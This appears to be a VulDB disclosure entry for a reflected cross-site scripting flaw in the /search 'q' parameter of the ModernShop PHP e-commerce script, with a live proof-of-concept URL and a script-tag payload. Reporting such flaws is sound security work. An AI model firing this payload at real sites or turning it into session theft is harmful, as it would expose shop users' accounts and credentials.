| Title | ABHI CODE BOX ModernShop 1 Reflected XSS |
|---|
| Description | # Exploit Title: ModernShop - RXSS
# Exploit Author: skalvin
# Date: 11-10-2025
# Author of Script: ABHIRAM B
# Vendor: ABHI CODE BOX
# Vendor Homepage: https://www.codester.com/items/comments/58847/modern-shop-php-ecommerce-platform
# Software Link: https://modernshop.apps.5g.in/
# Demo Link: https://modernshop.apps.5g.in/
# Tested on: Windows 11 Pro
# Impact: Manipulate the content of the site
# CWE: CWE-79 - CWE-74 - CWE-707
## Description
Attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path:
/search
GET parameter 'q' is vulnerable to XSS
Live POC:
https://modernshop.apps.5g.in/search?q=1bwkni%3e%3cscript%3ealert(1)%3c%2fscript%3ehu1c6
Payload:
bwkni><script>alert(1)</script>hu1c6
[-] Done |
|---|
| Source | ⚠️ https://modernshop.apps.5g.in/search?q=1bwkni%3e%3cscript%3ealert(1)%3c%2fscript%3ehu1c6 |
|---|
| User | skalvin (UID 49463) |
|---|
| Submission | 10/12/2025 09:00 (6 months ago) |
|---|
| Moderation | 10/26/2025 06:58 (14 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 329939 [abhicodebox ModernShop 20250922 /search q cross site scripting] |
|---|
| Points | 17 |
|---|